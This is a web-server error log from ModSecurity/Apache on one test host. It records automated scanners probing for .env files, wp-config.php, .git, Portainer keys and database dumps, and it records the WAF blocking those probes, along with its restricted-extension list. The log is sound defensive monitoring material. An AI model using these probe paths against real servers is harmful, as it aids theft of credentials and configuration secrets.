[Mon Sep 30 03:12:45.629987 2024] [:error] [pid 2292831] [client 45.135.232.70:56652] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wordpress/wp-config.php"] [unique_id "Zvn7Dab0PnYyMP2Lu2Ex1QAAAAQ"]
[Mon Sep 30 03:12:45.631136 2024] [authz_core:error] [pid 2293072] [client 45.135.232.70:56958] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:45.631446 2024] [:error] [pid 2293099] [client 45.135.232.70:56778] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /usr/share/myapp/config/.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/share/myapp/config/.env.development"] [unique_id "Zvn7DQPyyxcKczMGbeIueQAAAB8"]
[Mon Sep 30 03:12:45.631671 2024] [:error] [pid 2293099] [client 45.135.232.70:56778] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/share/myapp/config/.env.development"] [unique_id "Zvn7DQPyyxcKczMGbeIueQAAAB8"]
[Mon Sep 30 03:12:45.631815 2024] [:error] [pid 2293099] [client 45.135.232.70:56778] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/share/myapp/config/.env.development"] [unique_id "Zvn7DQPyyxcKczMGbeIueQAAAB8"]
[Mon Sep 30 03:12:45.660761 2024] [authz_core:error] [pid 2293119] [client 45.135.232.70:57120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:45.738012 2024] [:error] [pid 2293077] [client 45.135.232.70:56946] [client 45.135.232.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/var/lib/docker/volumes/portainer_data/_data/portainer.db"] [unique_id "Zvn7DQMeFdZtn5XH7AouXAAAABA"]
[Mon Sep 30 03:12:45.738419 2024] [:error] [pid 2293077] [client 45.135.232.70:56946] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/var/lib/docker/volumes/portainer_data/_data/portainer.db"] [unique_id "Zvn7DQMeFdZtn5XH7AouXAAAABA"]
[Mon Sep 30 03:12:45.738590 2024] [:error] [pid 2293077] [client 45.135.232.70:56946] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/var/lib/docker/volumes/portainer_data/_data/portainer.db"] [unique_id "Zvn7DQMeFdZtn5XH7AouXAAAABA"]
[Mon Sep 30 03:12:45.750075 2024] [authz_core:error] [pid 2293099] [client 45.135.232.70:57056] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:45.762855 2024] [authz_core:error] [pid 2293103] [client 45.135.232.70:57026] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:45.780375 2024] [authz_core:error] [pid 2293089] [client 45.135.232.70:57074] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:46.228847 2024] [authz_core:error] [pid 2293091] [client 45.135.232.70:57138] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Mon Sep 30 03:12:46.230529 2024] [:error] [pid 2293119] [client 45.135.232.70:57086] [client 45.135.232.70] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /var/www/html/.htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/html/.htaccess"] [unique_id "Zvn7DrhNUJ7xFmd9sJlvaQAAACw"]
[Mon Sep 30 03:12:46.230921 2024] [:error] [pid 2293119] [client 45.135.232.70:57086] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/html/.htaccess"] [unique_id "Zvn7DrhNUJ7xFmd9sJlvaQAAACw"]
[Mon Sep 30 03:12:46.231208 2024] [:error] [pid 2293119] [client 45.135.232.70:57086] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/html/.htaccess"] [unique_id "Zvn7DrhNUJ7xFmd9sJlvaQAAACw"]
[Mon Sep 30 03:12:46.386745 2024] [:error] [pid 2293082] [client 45.135.232.70:56270] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/www/myproject/.env"] [unique_id "Zvn7DOjkOZF_HPCCTMwlVQAAABU"]
[Mon Sep 30 03:12:46.386900 2024] [:error] [pid 2293082] [client 45.135.232.70:56270] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/www/myproject/.env"] [unique_id "Zvn7DOjkOZF_HPCCTMwlVQAAABU"]
[Mon Sep 30 03:12:46.988726 2024] [:error] [pid 2293063] [client 45.135.232.70:56956] [client 45.135.232.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/var/lib/docker/volumes/portainer_data/_data/portainer.key"] [unique_id "Zvn7DqftDAs9z02W9bMAhgAAAAg"]
[Mon Sep 30 03:12:46.989125 2024] [:error] [pid 2293063] [client 45.135.232.70:56956] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/var/lib/docker/volumes/portainer_data/_data/portainer.key"] [unique_id "Zvn7DqftDAs9z02W9bMAhgAAAAg"]
[Mon Sep 30 03:12:46.989293 2024] [:error] [pid 2293063] [client 45.135.232.70:56956] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/var/lib/docker/volumes/portainer_data/_data/portainer.key"] [unique_id "Zvn7DqftDAs9z02W9bMAhgAAAAg"]
[Tue Oct 01 23:33:00.430061 2024] [authz_core:error] [pid 2328466] [client 154.216.17.66:60384] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Oct 02 13:15:23.769809 2024] [:error] [pid 2335821] [client 87.120.112.197:62460] [client 87.120.112.197] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zv0rS6vWNGMHxP3avwuHlwAAAAI"]
[Wed Oct 02 13:15:23.771240 2024] [:error] [pid 2335821] [client 87.120.112.197:62460] [client 87.120.112.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zv0rS6vWNGMHxP3avwuHlwAAAAI"]
[Wed Oct 02 13:15:23.771580 2024] [:error] [pid 2335821] [client 87.120.112.197:62460] [client 87.120.112.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zv0rS6vWNGMHxP3avwuHlwAAAAI"]
[Wed Oct 02 14:49:53.994053 2024] [:error] [pid 2335822] [client 87.120.112.197:63128] [client 87.120.112.197] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zv1BcUq0pCYaIiFhczt5EAAAAAM"]
[Wed Oct 02 14:49:53.994848 2024] [:error] [pid 2335822] [client 87.120.112.197:63128] [client 87.120.112.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zv1BcUq0pCYaIiFhczt5EAAAAAM"]
[Wed Oct 02 14:49:53.995369 2024] [:error] [pid 2335822] [client 87.120.112.197:63128] [client 87.120.112.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zv1BcUq0pCYaIiFhczt5EAAAAAM"]
[Wed Oct 09 21:00:37.761557 2024] [:error] [pid 2487500] [client 87.120.112.197:55537] [client 87.120.112.197] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZwbS1UXHa-YdmkNkd7WYuwAAAAI"]
[Wed Oct 09 21:00:37.763835 2024] [:error] [pid 2487500] [client 87.120.112.197:55537] [client 87.120.112.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZwbS1UXHa-YdmkNkd7WYuwAAAAI"]
[Wed Oct 09 21:00:37.764291 2024] [:error] [pid 2487500] [client 87.120.112.197:55537] [client 87.120.112.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZwbS1UXHa-YdmkNkd7WYuwAAAAI"]
[Thu Oct 10 17:49:42.221255 2024] [authz_core:error] [pid 2508835] [client 92.118.39.244:55234] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Oct 24 15:24:56.023589 2024] [:error] [pid 2831152] [client 179.43.189.138:58952] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZxpKqCrMe6tT9Jkbl8Z2MgAAAAw"]
[Thu Oct 24 15:24:56.026054 2024] [:error] [pid 2831152] [client 179.43.189.138:58952] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZxpKqCrMe6tT9Jkbl8Z2MgAAAAw"]
[Thu Oct 24 15:24:56.026733 2024] [:error] [pid 2831152] [client 179.43.189.138:58952] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZxpKqCrMe6tT9Jkbl8Z2MgAAAAw"]
[Wed Nov 20 06:37:00.774400 2024] [authz_core:error] [pid 3432511] [client 103.102.230.7:55356] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Nov 23 01:20:04.256937 2024] [authz_core:error] [pid 3497106] [client 64.225.75.246:54500] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Sat Nov 23 01:20:05.109049 2024] [:error] [pid 3497107] [client 64.225.75.246:57836] [client 64.225.75.246] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z0EftWEdcFKcrd_qegGIHwAAAAg"]
[Sat Nov 23 01:20:05.109626 2024] [:error] [pid 3497107] [client 64.225.75.246:57836] [client 64.225.75.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z0EftWEdcFKcrd_qegGIHwAAAAg"]
[Sat Nov 23 01:20:05.110223 2024] [:error] [pid 3497107] [client 64.225.75.246:57836] [client 64.225.75.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z0EftWEdcFKcrd_qegGIHwAAAAg"]
[Sat Nov 23 01:20:05.208004 2024] [:error] [pid 3497104] [client 64.225.75.246:57850] [client 64.225.75.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0EftV2SxW3h1NpXhmVlzAAAAAQ"]
[Sat Nov 23 01:20:05.208780 2024] [:error] [pid 3497104] [client 64.225.75.246:57850] [client 64.225.75.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0EftV2SxW3h1NpXhmVlzAAAAAQ"]
[Sat Nov 23 01:20:05.209483 2024] [:error] [pid 3497104] [client 64.225.75.246:57850] [client 64.225.75.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0EftV2SxW3h1NpXhmVlzAAAAAQ"]
[Sat Nov 23 01:20:05.303388 2024] [authz_core:error] [pid 3497073] [client 64.225.75.246:57860] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Nov 23 02:24:19.058292 2024] [:error] [pid 3497074] [client 213.152.176.252:38895] [client 213.152.176.252] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z0Euw2_5RwEvYj7kdpUb4QAAAAc"]
[Sat Nov 23 02:24:19.058546 2024] [:error] [pid 3497074] [client 213.152.176.252:38895] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z0Euw2_5RwEvYj7kdpUb4QAAAAc"]
[Sat Nov 23 02:24:19.058755 2024] [:error] [pid 3497074] [client 213.152.176.252:38895] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z0Euw2_5RwEvYj7kdpUb4QAAAAc"]
[Sat Nov 23 02:24:19.060554 2024] [authz_core:error] [pid 3497106] [client 213.152.176.252:64131] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Nov 23 02:24:19.060567 2024] [authz_core:error] [pid 3497104] [client 213.152.176.252:9341] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.sql
